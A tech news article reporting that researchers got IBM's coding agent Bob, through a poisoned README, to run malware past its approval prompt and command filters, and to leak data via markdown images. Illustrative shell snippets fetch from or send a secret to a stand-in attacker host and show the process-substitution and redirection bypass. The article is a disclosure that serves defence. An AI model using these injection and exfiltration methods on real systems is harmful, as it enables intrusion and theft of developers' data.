
Researchers have found that IBM's AI coding agent, Bob, can be tricked via prompt injection into bypassing its security guardrails and executing malicious commands.


IBM's AI agent Bob easily duped to run malware, researchers show


Prompt injection lets risky commands slip past guardrails


IBM describes its coding agent thus: "Bob is your AI software development partner that understands your intent, repo, and security standards." Unfortunately, Bob doesn't always follow those security standards.

Announced last October and presently in closed beta testing, Bob comes in two forms: a command line interface – a CLI, like Claude Code – and an integrated development environment – an IDE, like Cursor.

Security researchers at PromptArmor have been evaluating Bob prior to general release and have found that IBM's "AI development partner" can be manipulated into executing malware. They report that the CLI is vulnerable to prompt injection attacks that allow malware execution and that the IDE is vulnerable to common AI-specific data exfiltration vectors.

AI agent software – models given access to tools and tasked with some goal in an iterative loop – is notoriously insecure and often comes with warnings from vendors. The risks have been demonstrated repeatedly by security researcher Johann Rehberger, among others. Agents may be vulnerable to prompt injection, jailbreaks, or more traditional code flaws that enable the execution of malicious code.

As Rehberger remarked at a recent presentation to the Chaos Computer Club, the fix for many of these risks involves putting a human in the loop to authorize risky action.

That's apparently the case with Bob. IBM's documentation, the PromptArmor Threat Intelligence Team explained in a writeup provided to The Register, includes a warning that setting high-risk commands to be automatically approved for agent usage potentially allows harmful operations.

Big Blue's recommendation is that users rely on allow lists and avoid wildcard characters, with the assumption that the agent will ask the user to approve or reject the automated use of fraught commands.

But according to PromptArmor, Bob's defenses are a bit too porous. Company researchers gave Bob a code repo to explore that contained a malicious README.md file. The file includes instructions that tell Bob it's responsible for conducting phishing training with the user.

[Screenshot of Bob CLI vulnerability, from PromptArmor]

The markdown file includes a series of "echo" commands, which, when run in a terminal, print a message to standard output. The first two are benign, and when Bob follows the instructions, the model presents a prompt in the terminal window asking the user to allow the command once, to always allow it, or to suggest changes.

In its third appearance, the "echo" command attempts to fetch a malicious script. And if the user has been lulled into allowing "echo" to run always, the malware will be installed and executed without approval.

Both the CLI and the IDE are still meant to apply additional security checks, even when a command has been given a green light to always run. Specifically, Bob disallows command substitution – "$(command)" – as a safeguard. But it doesn't check for process substitution, an omission the researchers spotted in the project's minified JavaScript code.
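A one-sided filter of that kind can be sketched as follows. This is an illustrative reconstruction, not Bob's actual code: the function name, patterns, and attacker URL are all invented.

```shell
#!/usr/bin/env bash
# Naive guardrail: rejects $(...) command substitution but knows
# nothing about <(...) or >(...) process substitution.
is_blocked() {
  case "$1" in
    *'$('*) return 0 ;;   # contains command substitution: block
    *)      return 1 ;;   # everything else: allow
  esac
}

is_blocked 'echo $(curl -s https://attacker.example/p.sh)' \
  && echo "command substitution: blocked"
is_blocked 'echo <(curl -s https://attacker.example/p.sh)' \
  || echo "process substitution: slips through"
```

Both strings hand the shell an attacker-chosen command to run, but only the first matches the filter – the second sails past it.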

[Screenshot of vulnerable Bob JavaScript code]

Also, the agent software fails to catch when separate subcommands have been chained together using the ">" redirection operator.

Thus, the researchers were able to prefix a series of malicious commands with the allowed "echo" command and run the entire set of instructions.
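A harmless reconstruction of that bypass, with the real payload fetch swapped for a local write – the path and script contents here are made up:

```shell
#!/usr/bin/env bash
# The whole line starts with the allow-listed 'echo', so a check on the
# first token waves it through automatically – but the redirection drops
# an attacker-controlled script onto disk. A real payload would fetch
# and run malware instead of printing a marker.
echo 'echo pwned' > /tmp/bob_poc.sh

# Executing the dropped file shows that code now runs without approval:
sh /tmp/bob_poc.sh    # prints: pwned
```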

"For IBM Bob, we were able to bypass several defense mechanisms - ultimately, the 'human in the loop' approval function only ends up validating an allow-listed safe command, when in reality more sensitive commands were being run (that were not on the allow-list)," explained Shankar Krishnan, managing director at PromptArmor, in an email to The Register.

"If this were tried with Claude Code, a programmatic defense would stop the attack flow and request user consent for the whole multi-part malicious command – even if the first command in the sequence were on the auto-approval list."

Given the ability to induce Bob to deliver an arbitrary shell script payload to the victim's machine, the attacker could run ransomware, steal credentials, or commandeer the device.

"There are a few plausible scenarios here," said Krishnan. "This risk is relevant for any developer workflows that leverage untrusted data. For example, Bob can read webpages – a prompt injection can be encountered if the user requests that Bob review a site containing untrusted content (e.g. developer docs, StackOverflow). Bob can also read terminal command outputs – an injection in a third-party data source can be printed after a command is run and ingested by Bob. Our write-up considers a developer working with an untrusted open-source repository, as it is a self-contained and realistic example."

Additionally, the PromptArmor researchers say that the IDE is susceptible to a zero-click data exfiltration attack that affects a number of AI applications. Specifically, Bob renders markdown images in model output under a Content Security Policy loose enough that the resulting network requests can reach – and be logged by – attacker-controlled endpoints, potentially allowing data exfiltration via pre-fetched JSON schemas.
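The underlying primitive is the well-known markdown-image exfiltration trick: if injected instructions can coax the model into embedding secret data in an image URL, rendering the markdown triggers a request that delivers the secret to the attacker's server logs. A toy illustration – the domain and "secret" are invented:

```shell
#!/usr/bin/env bash
SECRET="api_key=EXAMPLE-NOT-REAL"   # stands in for data the agent can see
# Markdown the attacker tricks the model into emitting; when the client
# renders it, the image GET carries the secret in its query string.
printf '![status](https://attacker.example/pixel.png?d=%s)\n' "$SECRET"
```

A strict Content Security Policy that restricts image sources to trusted hosts blocks exactly this request, which is why the researchers flag Bob's permissive policy.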

IBM did not immediately respond to a request for comment. We're told that the company has been informed of the vulnerability. ®

